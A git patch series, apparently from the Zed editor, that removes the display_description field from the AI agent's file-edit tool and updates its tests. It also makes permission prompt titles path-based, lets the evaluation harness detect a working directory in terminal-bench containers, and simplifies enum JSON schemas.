tests { // Setup: description + path + mode sender.send_partial(json!({ - "display_description": "Edit three lines", "path": "root/file.txt", "mode": "edit" })); @@ -1925,7 +1871,6 @@ mod tests { // Edit 1 in progress sender.send_partial(json!({ - "display_description": "Edit three lines", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "aaa", "new_text": "AAA"}] @@ -1934,7 +1879,6 @@ mod tests { // Edit 2 appears — edit 1 is now complete and should be applied sender.send_partial(json!({ - "display_description": "Edit three lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -1957,7 +1901,6 @@ mod tests { // Edit 3 appears — edit 2 is now complete and should be applied sender.send_partial(json!({ - "display_description": "Edit three lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -1980,7 +1923,6 @@ mod tests { // Send final sender.send_full(json!({ - "display_description": "Edit three lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -2007,7 +1949,6 @@ mod tests { // Setup sender.send_partial(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit" })); @@ -2015,7 +1956,6 @@ mod tests { // Edit 1 (valid) in progress — not yet complete (no second edit) sender.send_partial(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -2027,7 +1967,6 @@ mod tests { // Edit 2 appears (will fail to match) — this makes edit 1 complete. // Edit 1 should be applied. Edit 2 is still in-progress (last edit). sender.send_partial(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -2054,7 +1993,6 @@ mod tests { // Edit 3 appears — this makes edit 2 "complete", triggering its // resolution which should fail (old_text doesn't exist in the file). 
sender.send_partial(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -2101,14 +2039,12 @@ mod tests { // Setup + single edit that stays in-progress (no second edit to prove completion) sender.send_partial(json!({ - "display_description": "Single edit", "path": "root/file.txt", "mode": "edit", })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Single edit", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "hello world", "new_text": "goodbye world"}] @@ -2133,7 +2069,6 @@ mod tests { // Send final — the edit is applied during finalization sender.send_full(json!({ - "display_description": "Single edit", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "hello world", "new_text": "goodbye world"}] @@ -2156,20 +2091,16 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send progressively more complete partial snapshots, as the LLM would - sender.send_partial(json!({ - "display_description": "Edit lines" - })); + sender.send_partial(json!({})); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit" })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] @@ -2178,7 +2109,6 @@ mod tests { // Send the final complete input sender.send_full(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] @@ -2201,9 +2131,7 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send a partial then drop the sender without sending final - sender.send_partial(json!({ - "display_description": "Edit file" - })); + sender.send_partial(json!({})); cx.run_until_parked(); drop(sender); @@ -2227,15 
+2155,13 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Buffer several partials before sending the final - sender.send_partial(json!({"display_description": "Create"})); - sender.send_partial(json!({"display_description": "Create", "path": "root/dir/new.txt"})); + sender.send_partial(json!({})); + sender.send_partial(json!({"path": "root/dir/new.txt"})); sender.send_partial(json!({ - "display_description": "Create", "path": "root/dir/new.txt", "mode": "write" })); sender.send_full(json!({ - "display_description": "Create", "path": "root/dir/new.txt", "mode": "write", "content": "streamed content" @@ -2419,14 +2345,12 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); sender.send_partial(json!({ - "display_description": "Create main function", "path": "root/src/main.rs", "mode": "write" })); cx.run_until_parked(); sender.send_full(json!({ - "display_description": "Create main function", "path": "root/src/main.rs", "mode": "write", "content": UNFORMATTED_CONTENT @@ -2477,14 +2401,12 @@ mod tests { let task = cx.update(|cx| tool2.run(input, event_stream, cx)); sender.send_partial(json!({ - "display_description": "Update main function", "path": "root/src/main.rs", "mode": "write" })); cx.run_until_parked(); sender.send_full(json!({ - "display_description": "Update main function", "path": "root/src/main.rs", "mode": "write", "content": UNFORMATTED_CONTENT @@ -2540,7 +2462,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Create main function".into(), path: "root/src/main.rs".into(), mode: EditFileMode::Write, content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), @@ -2588,7 +2509,6 @@ mod tests { .update(|cx| { tool2.run( ToolInput::resolved(EditFileToolInput { - display_description: "Update main function".into(), path: "root/src/main.rs".into(), mode: EditFileMode::Write, content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), @@ 
-2617,52 +2537,40 @@ mod tests { // Test 1: Path with .zed component should require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from(".zed/settings.json"), - "test 1", - &stream_tx, - cx, - ) - }); + let _auth = + cx.update(|cx| tool.authorize(&PathBuf::from(".zed/settings.json"), &stream_tx, cx)); let event = stream_rx.expect_authorization().await; assert_eq!( event.tool_call.fields.title, - Some("test 1 (local settings)".into()) + Some("Edit `.zed/settings.json` (local settings)".into()) ); // Test 2: Path outside project should require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = - cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 2", &stream_tx, cx)); + let _auth = cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), &stream_tx, cx)); let event = stream_rx.expect_authorization().await; - assert_eq!(event.tool_call.fields.title, Some("test 2".into())); + assert_eq!( + event.tool_call.fields.title, + Some("Edit `/etc/hosts`".into()) + ); // Test 3: Relative path without .zed should not require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| { - tool.authorize(&PathBuf::from("root/src/main.rs"), "test 3", &stream_tx, cx) - }) - .await - .unwrap(); + cx.update(|cx| tool.authorize(&PathBuf::from("root/src/main.rs"), &stream_tx, cx)) + .await + .unwrap(); assert!(stream_rx.try_recv().is_err()); // Test 4: Path with .zed in the middle should require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from("root/.zed/tasks.json"), - "test 4", - &stream_tx, - cx, - ) - }); + let _auth = + cx.update(|cx| tool.authorize(&PathBuf::from("root/.zed/tasks.json"), &stream_tx, cx)); let event = stream_rx.expect_authorization().await; assert_eq!( event.tool_call.fields.title, - Some("test 4 (local 
settings)".into()) + Some("Edit `root/.zed/tasks.json` (local settings)".into()) ); // Test 5: When global default is allow, sensitive and outside-project @@ -2675,39 +2583,26 @@ mod tests { // 5.1: .zed/settings.json is a sensitive path — still prompts let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from(".zed/settings.json"), - "test 5.1", - &stream_tx, - cx, - ) - }); + let _auth = + cx.update(|cx| tool.authorize(&PathBuf::from(".zed/settings.json"), &stream_tx, cx)); let event = stream_rx.expect_authorization().await; assert_eq!( event.tool_call.fields.title, - Some("test 5.1 (local settings)".into()) + Some("Edit `.zed/settings.json` (local settings)".into()) ); // 5.2: /etc/hosts is outside the project, but Allow auto-approves let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 5.2", &stream_tx, cx)) + cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), &stream_tx, cx)) .await .unwrap(); assert!(stream_rx.try_recv().is_err()); // 5.3: Normal in-project path with allow — no confirmation needed let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| { - tool.authorize( - &PathBuf::from("root/src/main.rs"), - "test 5.3", - &stream_tx, - cx, - ) - }) - .await - .unwrap(); + cx.update(|cx| tool.authorize(&PathBuf::from("root/src/main.rs"), &stream_tx, cx)) + .await + .unwrap(); assert!(stream_rx.try_recv().is_err()); // 5.4: With Confirm default, non-project paths still prompt @@ -2718,11 +2613,13 @@ mod tests { }); let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx - .update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 5.4", &stream_tx, cx)); + let _auth = cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), &stream_tx, cx)); let event = stream_rx.expect_authorization().await; - assert_eq!(event.tool_call.fields.title, Some("test 
5.4".into())); + assert_eq!( + event.tool_call.fields.title, + Some("Edit `/etc/hosts`".into()) + ); } #[gpui::test] @@ -2744,14 +2641,8 @@ mod tests { }); let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let authorize_task = cx.update(|cx| { - tool.authorize( - &PathBuf::from("link/new.txt"), - "create through symlink", - &stream_tx, - cx, - ) - }); + let authorize_task = + cx.update(|cx| tool.authorize(&PathBuf::from("link/new.txt"), &stream_tx, cx)); let event = stream_rx.expect_authorization().await; assert!( @@ -2808,7 +2699,6 @@ mod tests { let _authorize_task = cx.update(|cx| { tool.authorize( &PathBuf::from("link_to_external/config.txt"), - "edit through symlink", &stream_tx, cx, ) @@ -2854,7 +2744,6 @@ mod tests { let authorize_task = cx.update(|cx| { tool.authorize( &PathBuf::from("link_to_external/config.txt"), - "edit through symlink", &stream_tx, cx, ) @@ -2911,7 +2800,6 @@ mod tests { .update(|cx| { tool.authorize( &PathBuf::from("link_to_external/config.txt"), - "edit through symlink", &stream_tx, cx, ) @@ -2956,8 +2844,7 @@ mod tests { for (path, should_confirm, description) in test_cases { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = - cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); + let auth = cx.update(|cx| tool.authorize(&PathBuf::from(path), &stream_tx, cx)); if should_confirm { stream_rx.expect_authorization().await; @@ -3033,8 +2920,7 @@ mod tests { for (path, should_confirm, description) in test_cases { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = - cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); + let auth = cx.update(|cx| tool.authorize(&PathBuf::from(path), &stream_tx, cx)); if should_confirm { stream_rx.expect_authorization().await; @@ -3092,8 +2978,7 @@ mod tests { for (path, should_confirm, description) in test_cases { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = 
- cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); + let auth = cx.update(|cx| tool.authorize(&PathBuf::from(path), &stream_tx, cx)); cx.run_until_parked(); @@ -3134,41 +3019,23 @@ mod tests { // Test .zed path with different modes let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from("project/.zed/settings.json"), - "Edit settings", - &stream_tx, - cx, - ) + tool.authorize(&PathBuf::from("project/.zed/settings.json"), &stream_tx, cx) }); stream_rx.expect_authorization().await; // Test outside path with different modes let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from("/outside/file.txt"), - "Edit file", - &stream_tx, - cx, - ) - }); + let _auth = + cx.update(|cx| tool.authorize(&PathBuf::from("/outside/file.txt"), &stream_tx, cx)); stream_rx.expect_authorization().await; // Test normal path with different modes let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| { - tool.authorize( - &PathBuf::from("project/normal.txt"), - "Edit file", - &stream_tx, - cx, - ) - }) - .await - .unwrap(); + cx.update(|cx| tool.authorize(&PathBuf::from("project/normal.txt"), &stream_tx, cx)) + .await + .unwrap(); assert!(stream_rx.try_recv().is_err()); } } @@ -3186,27 +3053,6 @@ mod tests { tool.initial_title( Err(json!({ "path": "src/main.rs", - "display_description": "", - })), - cx - ), - "src/main.rs" - ); - assert_eq!( - tool.initial_title( - Err(json!({ - "path": "", - "display_description": "Fix error handling", - })), - cx - ), - "Fix error handling" - ); - assert_eq!( - tool.initial_title( - Err(json!({ - "path": "src/main.rs", - "display_description": "Fix error handling", })), cx ), @@ -3216,7 +3062,6 @@ mod tests { tool.initial_title( Err(json!({ "path": "", - "display_description": "", })), cx ), @@ -3244,7 +3089,6 @@ mod tests { let edit = cx.update(|cx| { 
tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit file".into(), path: path!("/main.rs").into(), mode: EditFileMode::Write, content: Some("new content".into()), @@ -3274,7 +3118,6 @@ mod tests { let edit = cx.update(|cx| { tool.run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit file".into(), path: path!("/main.rs").into(), mode: EditFileMode::Write, content: Some("dropped content".into()), @@ -3323,7 +3166,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "First edit".into(), path: "root/test.txt".into(), mode: EditFileMode::Edit, content: None, @@ -3348,7 +3190,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Second edit".into(), path: "root/test.txt".into(), mode: EditFileMode::Edit, content: None, @@ -3426,7 +3267,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit after external change".into(), path: "root/test.txt".into(), mode: EditFileMode::Edit, content: None, @@ -3511,7 +3351,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit after external change".into(), path: "root/test.txt".into(), mode: EditFileMode::Edit, content: None, @@ -3596,7 +3435,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit with dirty buffer".into(), path: "root/test.txt".into(), mode: EditFileMode::Edit, content: None, @@ -3652,7 +3490,6 @@ mod tests { // Setup: resolve the buffer sender.send_partial(json!({ - "display_description": "Overlapping edits", "path": "root/file.txt", "mode": "edit" })); @@ -3664,7 +3501,6 @@ mod tests { // in the modified buffer and replaces it with "ZZZ". // Edit 3 exists only to mark edit 2 as "complete" during streaming. 
sender.send_partial(json!({ - "display_description": "Overlapping edits", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -3677,7 +3513,6 @@ mod tests { // Send the final input with all three edits. sender.send_full(json!({ - "display_description": "Overlapping edits", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -3703,7 +3538,6 @@ mod tests { // Transition to BufferResolved sender.send_partial(json!({ - "display_description": "Create new file", "path": "root/dir/new_file.txt", "mode": "write" })); @@ -3711,7 +3545,6 @@ mod tests { // Stream content incrementally sender.send_partial(json!({ - "display_description": "Create new file", "path": "root/dir/new_file.txt", "mode": "write", "content": "line 1\n" @@ -3729,7 +3562,6 @@ mod tests { // Stream more content sender.send_partial(json!({ - "display_description": "Create new file", "path": "root/dir/new_file.txt", "mode": "write", "content": "line 1\nline 2\n" @@ -3739,7 +3571,6 @@ mod tests { // Stream final chunk sender.send_partial(json!({ - "display_description": "Create new file", "path": "root/dir/new_file.txt", "mode": "write", "content": "line 1\nline 2\nline 3\n" @@ -3752,7 +3583,6 @@ mod tests { // Send final input sender.send_full(json!({ - "display_description": "Create new file", "path": "root/dir/new_file.txt", "mode": "write", "content": "line 1\nline 2\nline 3\n" @@ -3778,13 +3608,11 @@ mod tests { // Transition to BufferResolved sender.send_partial(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write" })); @@ -3802,7 +3630,6 @@ mod tests { // Stream first content chunk sender.send_partial(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write", "content": "new line 1\n" @@ -3816,7 +3643,6 @@ mod tests { // Send final input sender.send_full(json!({ - "display_description": "Overwrite 
file", "path": "root/file.txt", "mode": "write", "content": "new line 1\nnew line 2\n" @@ -3849,7 +3675,6 @@ mod tests { // Transition to BufferResolved sender.send_partial(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write" })); @@ -3868,7 +3693,6 @@ mod tests { // First content partial replaces old content sender.send_partial(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write", "content": "new line 1\n" @@ -3878,7 +3702,6 @@ mod tests { // Subsequent content partials append sender.send_partial(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write", "content": "new line 1\nnew line 2\n" @@ -3891,7 +3714,6 @@ mod tests { // Send final input with complete content sender.send_full(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write", "content": "new line 1\nnew line 2\nnew line 3\n" @@ -3917,7 +3739,6 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); sender.send_partial(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "edit" })); @@ -3929,7 +3750,6 @@ mod tests { // partial 1: old_text = "hello\\" (fixer closes incomplete \n as \\) // partial 2: old_text = "hello\nworld" (fixer corrected the escape) sender.send_partial(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "hello\\"}] @@ -3938,7 +3758,6 @@ mod tests { // Now the fixer corrects it to the real newline. sender.send_partial(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "hello\nworld"}] @@ -3947,7 +3766,6 @@ mod tests { // Send final. 
sender.send_full(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "hello\nworld", "new_text": "HELLO\nWORLD"}] @@ -3969,14 +3787,12 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); sender.send_partial(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "edit" })); cx.run_until_parked(); sender.send_full(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "edit", "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" @@ -4005,7 +3821,6 @@ mod tests { let task = cx.update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit lines".to_string(), path: "root/file.txt".into(), mode: EditFileMode::Edit, content: None, @@ -4049,7 +3864,6 @@ mod tests { let task = cx.update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Overwrite file".to_string(), path: "root/file.txt".into(), mode: EditFileMode::Write, content: Some("completely new content".into()), @@ -4084,20 +3898,17 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); sender.send_partial(json!({ - "display_description": "Overwrite file", "mode": "write" })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Overwrite file", "mode": "write", "content": "new_content" })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Overwrite file", "mode": "write", "content": "new_content", "path": "root" @@ -4106,7 +3917,6 @@ mod tests { // Send final. 
sender.send_full(json!({ - "display_description": "Overwrite file", "mode": "write", "content": "new_content", "path": "root/file.txt" @@ -4130,27 +3940,23 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); sender.send_partial(json!({ - "display_description": "Overwrite file", "mode": "edit" })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Overwrite file", "mode": "edit", "edits": [{"old_text": "old_content"}] })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Overwrite file", "mode": "edit", "edits": [{"old_text": "old_content", "new_text": "new_content"}] })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Overwrite file", "mode": "edit", "edits": [{"old_text": "old_content", "new_text": "new_content"}], "path": "root" @@ -4159,7 +3965,6 @@ mod tests { // Send final. sender.send_full(json!({ - "display_description": "Overwrite file", "mode": "edit", "edits": [{"old_text": "old_content", "new_text": "new_content"}], "path": "root/file.txt" @@ -4200,7 +4005,6 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); sender.send_full(json!({ - "display_description": "Remove extra blank lines", "path": "root/file.rs", "mode": "edit", "edits": [{"old_text": old_text, "new_text": new_text}] @@ -4241,7 +4045,6 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); sender.send_full(json!({ - "display_description": "description", "path": "root/file.rs", "mode": "edit", "edits": [{"old_text": old_text, "new_text": new_text}] @@ -4278,7 +4081,6 @@ mod tests { let task = cx.update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Create new file".into(), path: "root/dir/new_file.txt".into(), mode: EditFileMode::Write, content: Some("Hello, World!".into()), @@ -4318,7 +4120,6 @@ mod tests { #[test] fn test_input_deserializes_double_encoded_fields() { let 
input = serde_json::from_value::(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "\"edit\"", "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" @@ -4332,7 +4133,6 @@ mod tests { assert_eq!(edits[0].new_text, "HELLO\nWORLD"); let input = serde_json::from_value::(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "\"edit\"" })) @@ -4340,7 +4140,6 @@ mod tests { assert!(input.edits.is_none()); let input = serde_json::from_value::(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "\"edit\"", "edits": null @@ -4349,7 +4148,6 @@ mod tests { assert!(input.edits.is_none()); let input = serde_json::from_value::(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "\"edit\"", "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" @@ -4363,7 +4161,6 @@ mod tests { assert_eq!(edits[0].new_text.as_deref(), Some("HELLO\nWORLD")); let input = serde_json::from_value::(json!({ - "display_description": "Edit", "path": "root/file.txt" })) .expect("input should deserialize"); @@ -4371,7 +4168,6 @@ mod tests { assert!(input.edits.is_none()); let input = serde_json::from_value::(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": null, "edits": null diff --git a/crates/agent/src/tools/tool_permissions.rs b/crates/agent/src/tools/tool_permissions.rs index 4304877cd078f5..aa541c3e0ef579 100644 --- a/crates/agent/src/tools/tool_permissions.rs +++ b/crates/agent/src/tools/tool_permissions.rs @@ -381,7 +381,6 @@ pub fn collect_symlink_escapes<'a>( pub fn authorize_file_edit( tool_name: &str, path: &Path, - display_description: &str, thread: &WeakEntity, event_stream: &ToolCallEventStream, cx: &mut App, @@ -396,7 +395,7 @@ pub fn authorize_file_edit( } let path_owned = path.to_path_buf(); - let display_description = display_description.to_string(); + let title = format!("Edit {}", 
util::markdown::MarkdownInlineCode(&path_str)); let tool_name = tool_name.to_string(); let thread = thread.clone(); let event_stream = event_stream.clone(); @@ -486,7 +485,7 @@ pub fn authorize_file_edit( vec![path_owned.to_string_lossy().to_string()], ); event_stream.authorize_always_prompt( - format!("{} (local settings)", display_description), + format!("{title} (local settings)"), context, cx, ) @@ -499,11 +498,7 @@ pub fn authorize_file_edit( &tool_name, vec![path_owned.to_string_lossy().to_string()], ); - event_stream.authorize_always_prompt( - format!("{} (settings)", display_description), - context, - cx, - ) + event_stream.authorize_always_prompt(format!("{title} (settings)"), context, cx) }); return authorize.await; } @@ -518,7 +513,7 @@ pub fn authorize_file_edit( &tool_name, vec![path_owned.to_string_lossy().to_string()], ); - event_stream.authorize(&display_description, context, cx) + event_stream.authorize(&title, context, cx) }); authorize.await } From 2dcf7b1bf5a6a2df5320ca73482d1a68b7f08e9e Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Tue, 5 May 2026 14:32:58 +0200 Subject: [PATCH 189/231] eval_cli: Fixes for termbench (#55762) Release Notes: - N/A --- crates/eval_cli/src/main.rs | 2 +- crates/eval_cli/zed_eval/agent.py | 49 +++++++++++++++++++++++-------- 2 files changed, 37 insertions(+), 14 deletions(-) diff --git a/crates/eval_cli/src/main.rs b/crates/eval_cli/src/main.rs index bb6cbc883e1b6d..e77e75bc87980e 100644 --- a/crates/eval_cli/src/main.rs +++ b/crates/eval_cli/src/main.rs @@ -70,7 +70,7 @@ struct Args { workdir: PathBuf, /// Instruction/prompt text. If omitted, read from --instruction-file or stdin. - #[arg(long)] + #[arg(long, allow_hyphen_values = true)] instruction: Option, /// Language model to use, in `provider/model` format. 
diff --git a/crates/eval_cli/zed_eval/agent.py b/crates/eval_cli/zed_eval/agent.py index 54403e9a2531fd..4543dd9497d6b7 100644 --- a/crates/eval_cli/zed_eval/agent.py +++ b/crates/eval_cli/zed_eval/agent.py @@ -52,19 +52,20 @@ def name() -> str: return "zed" async def _detect_workdir(self, environment: BaseEnvironment) -> str: - """Detect the repo working directory inside the container. + """Detect the working directory inside the container. Checks, in order: 1. Explicit ``EVAL_CLI_WORKDIR`` extra-env override - 2. ``/app`` (SWE-bench Pro) - 3. ``/testbed`` (SWE-bench Verified) - 4. ``/repo`` - 5. First git repo found under ``/`` (max depth 3) + 2. Well-known dirs with a ``.git`` subdirectory (SWE-bench style) + 3. First git repo found under ``/`` (max depth 3) + 4. Well-known dirs that exist at all (terminal-bench style) + 5. The container's default working directory (``pwd``) """ override = self._extra_env.get("EVAL_CLI_WORKDIR") if override: return override + # First: try to find a git repo (SWE-bench, etc.) result = await self.exec_as_agent( environment, command=( @@ -75,13 +76,29 @@ async def _detect_workdir(self, environment: BaseEnvironment) -> str: '| head -1 | sed "s|/.git$||"' ), ) - workdir = result.stdout.strip() - if not workdir: - raise RuntimeError( - "Could not find a git repository in the container. " - "Set EVAL_CLI_WORKDIR explicitly via --ae EVAL_CLI_WORKDIR=/path/to/repo" - ) - return workdir + workdir = (result.stdout or "").strip() + if workdir: + return workdir + + # Fallback: use the first well-known directory that exists, + # even without .git (terminal-bench containers aren't git repos). + result = await self.exec_as_agent( + environment, + command=( + "for d in /app /testbed /repo /root /home; do " + ' if [ -d "$d" ]; then echo "$d"; exit 0; fi; ' + "done; " + "pwd" + ), + ) + workdir = (result.stdout or "").strip() + if workdir: + return workdir + + raise RuntimeError( + "Could not detect a working directory in the container. 
" + "Set EVAL_CLI_WORKDIR explicitly via --ae EVAL_CLI_WORKDIR=/path/to/repo" + ) async def install(self, environment: BaseEnvironment) -> None: # Detect the package manager and install base dependencies. @@ -426,12 +443,18 @@ async def run( env=env, ) + # Only generate a patch if the workdir is a git repo + # (SWE-bench style). Terminal-bench containers aren't git repos. await self.exec_as_agent( environment, command=( + 'if [ -d ".git" ]; then ' "git add -A && " "git diff --cached HEAD > /logs/agent/patch.diff && " - 'echo "Patch size: $(wc -c < /logs/agent/patch.diff) bytes"' + 'echo "Patch size: $(wc -c < /logs/agent/patch.diff) bytes"; ' + "else " + 'echo "No git repo found, skipping patch generation"; ' + "fi" ), cwd=workdir, ) From cc081c92b9d8ae86b6e1e55be807d8a4b7b2dc47 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Tue, 5 May 2026 14:39:41 +0200 Subject: [PATCH 190/231] agent: Simplify tool schemas for enums (#55763) Previously schemars generated oneOf variants for these enums (because we added inline comments), making the schemas more complicated than they had to be. E.g. `edit_file` `mode` Before: ```json { "mode": { "description": "The mode of operation on the file. Possible values:\n- 'write': Replace the entire contents of the file. If the file doesn't exist, it will be created. Requires 'content' field.\n- 'edit': Make granular edits to an existing file. Requires 'edits' field.\n\nWhen a file already exists or you just created it, prefer editing it as opposed to recreating it from scratch.", "oneOf": [ { "description": "Overwrite the file with new content (replacing any existing content).\nIf the file does not exist, it will be created.", "type": "string", "const": "write" }, { "description": "Make granular edits to an existing file", "type": "string", "const": "edit" } ] } } ``` After: ```json { "mode": { "description": "The mode of operation on the file. Possible values:\n- 'write': Replace the entire contents of the file. 
If the file doesn't exist, it will be created. Requires 'content' field.\n- 'edit': Make granular edits to an existing file. Requires 'edits' field.\n\nWhen a file already exists or you just created it, prefer editing it as opposed to recreating it from scratch.", "type": "string", "enum": ["write", "edit"] } } ``` Release Notes: - N/A --- crates/agent/src/tools/edit_file_tool.rs | 3 --- crates/agent/src/tools/now_tool.rs | 4 +--- 2 files changed, 1 insertion(+), 6 deletions(-) diff --git a/crates/agent/src/tools/edit_file_tool.rs b/crates/agent/src/tools/edit_file_tool.rs index 0e6493953c95ce..234b4ac92f29d3 100644 --- a/crates/agent/src/tools/edit_file_tool.rs +++ b/crates/agent/src/tools/edit_file_tool.rs @@ -94,10 +94,7 @@ pub struct EditFileToolInput { #[derive(Clone, Copy, Debug, Serialize, Deserialize, JsonSchema)] #[serde(rename_all = "snake_case")] pub enum EditFileMode { - /// Overwrite the file with new content (replacing any existing content). - /// If the file does not exist, it will be created. Write, - /// Make granular edits to an existing file Edit, } diff --git a/crates/agent/src/tools/now_tool.rs b/crates/agent/src/tools/now_tool.rs index f8f4e0d91b5f0e..4032731097c8c0 100644 --- a/crates/agent/src/tools/now_tool.rs +++ b/crates/agent/src/tools/now_tool.rs @@ -12,10 +12,8 @@ use crate::{AgentTool, ToolCallEventStream, ToolInput}; #[serde(rename_all = "snake_case")] #[schemars(inline)] pub enum Timezone { - /// Use UTC for the datetime. #[serde(alias = "UTC", alias = "Utc")] Utc, - /// Use local time for the datetime. #[serde(alias = "LOCAL", alias = "Local")] Local, } @@ -24,7 +22,7 @@ pub enum Timezone { /// Only use this tool when the user specifically asks for it or the current task would benefit from knowing the current datetime. #[derive(Debug, Serialize, Deserialize, JsonSchema)] pub struct NowToolInput { - /// The timezone to use for the datetime. + /// The timezone to use for the datetime. 
